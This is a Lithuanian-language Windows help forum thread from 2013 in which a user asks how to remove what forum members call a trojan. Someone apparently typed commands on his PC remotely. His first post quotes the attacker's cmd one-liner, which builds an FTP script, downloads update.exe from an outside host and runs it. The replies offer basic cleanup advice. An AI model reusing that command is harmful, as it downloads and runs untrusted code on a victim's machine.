VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Viskas apie "Microsoft Windows" operacines sistemas
thenexus
Posts: 4
Joined: Sat May 11, 2013 8:57 pm

VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby thenexus » Sat May 11, 2013 9:00 pm

Sveiki, taigi jau kelias dienas, būnant man prie pc, kažkas pradeda rašyt, taigi padėjas pelyte ant ten kur reikia naršyklės adresa vest pamatau tai:
cmd /c echo open upgrade2.myftp.org 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

echo You got owned
upgrade2.myftp.org Adresas būvo kitoks..
Turiu 2 antivirusines, pilnai atnaujintas - Malwarabytes Anti-Malware PRO ir AVG Internet Security, visada buvo įjungtos, kaip galėjo tas shudas patekt į mano kompiuterį? Gali pakenkti mano kompiuteriui? IR KAIP JI PANAIKINT? DĖKUI.. Nieko nesisiunčiau iš youtubės tų programų, ar kokiu ten "hacku" siunčiusi tik ta kas daug žmonių atsiūstą ir parašyta komentarai kaip veikia ir pnš PARAŠAU PAGALBOS

User avatar
arnie
Rašytojas
Posts: 1073
Joined: Fri May 01, 2009 11:28 am

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby arnie » Sat May 11, 2013 9:14 pm

Kokioje narsykleje tai vyksta jei nelabai reikalinga padaruk jei unistal . Siaip ja pasiziurek per Task manageri (ctrl-alt-del) prie procesu turetu buti juo pavadinimas update .exe padaryk end process arba pabandyk per search paieskoti kur yra ta update.exe tada trink ja . :|
Image

thenexus
Posts: 4
Joined: Sat May 11, 2013 8:57 pm

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby thenexus » Sat May 11, 2013 9:18 pm

Tai vyksta ant mano PC windows 7, tiesiog iš oro kažkas pradeda rašyt, nes ar puslapis pradeda ten judėt ar pnš, tai padėjau pelyte kad rašytu ant viršaus, šeip buvau isirases TIGHT VNC ir REAL VNC, buvau prisijunges prie VPS, ir ten buvau pajunges kažkoki IP, ir atrodo buvau leides jam prisijungti tik prie mano VPS, gali tai pereiti ir į PC? nes nelabai suprantu iškur tas shudas?

User avatar
arnie
Rašytojas
Posts: 1073
Joined: Fri May 01, 2009 11:28 am

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby arnie » Sat May 11, 2013 9:41 pm

Pabandyk atsidaryti control panel/valdymo skyde interneto options ten prie connections pasiziurek savo interneto rysi ir atsidares settings pasiziurek proxsy serverio prisijungima . O ta update . exe susirask ir isjunk su sia programa pasirink procces three http://portableapps.com/apps/utilities/ ... r-portable
Image

User avatar
arunaseslt
Posts: 552
Joined: Sun May 25, 2008 4:09 pm

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby arunaseslt » Sun May 12, 2013 1:01 am

man rodos kad tavo kompas naudojamas ddos puolimams

thenexus
Posts: 4
Joined: Sat May 11, 2013 8:57 pm

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby thenexus » Sun May 12, 2013 10:17 am

tai ka daryti? kaip panaikinti ji?

User avatar
arunaseslt
Posts: 552
Joined: Sun May 25, 2008 4:09 pm

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby arunaseslt » Sun May 12, 2013 10:29 am

cia as nusisnekejau su tuo ddos,vakar alaus padauginau :lol: ,cia trojanas,restauruok sistema,praleisk su ccleaner,pora antivirusiniu online

thenexus
Posts: 4
Joined: Sat May 11, 2013 8:57 pm

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby thenexus » Sun May 12, 2013 10:31 am

Turiu tas dvi antivirusines, nieko neaptinka.. Nu ccleaneri atsisiusiu

User avatar
SiGiS
Rašytojas
Posts: 2288
Joined: Thu Jul 06, 2006 2:31 pm
Location: Panevėžys

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby SiGiS » Thu May 16, 2013 6:56 pm

Įsirašyk trečia - gal visai kompas nebeįsijungs. Negalima dviejų antivirusinių kompe turėti - susipjauna jos tarpusavyje. Mesk abi lauk, įsijunk suinstaliuok eset online scaner ir prasivalysi tą kompą.
Sunku pamatyti juodą katę tamsiame kambaryje, jei jos ten visai nėra.. (kinų patarlė)
Kas pasakė, kad gyvenimas gražus? Juk dar nei vienas iš jo neišėjo gyvas...

User avatar
megejas
Posts: 114
Joined: Wed Apr 03, 2013 5:46 pm
Location: Pagėgiai

Re: VIRUSAS? ECHO YOU GOT OWNED? PADĖKIT

Postby megejas » Thu May 16, 2013 8:56 pm

Kartais ir antivirusinės nebepravalo, jei Windows pažeisti. Tenka daryti clean Windows install.
AMD Phenom II X6 1045T @3,24Ghz; 8GB DDR2 800Mhz; SSD 256GB + 3xHDD 5,5TB; AMD ATI HD 7950; Asus M5A99X Evo R2.0; Thermaltake Contac 21; Thermaltake Commander MS-III; OCZ 650W


Return to “Microsoft Windows”

Who is online

Users browsing this forum: No registered users and 46 guests

cron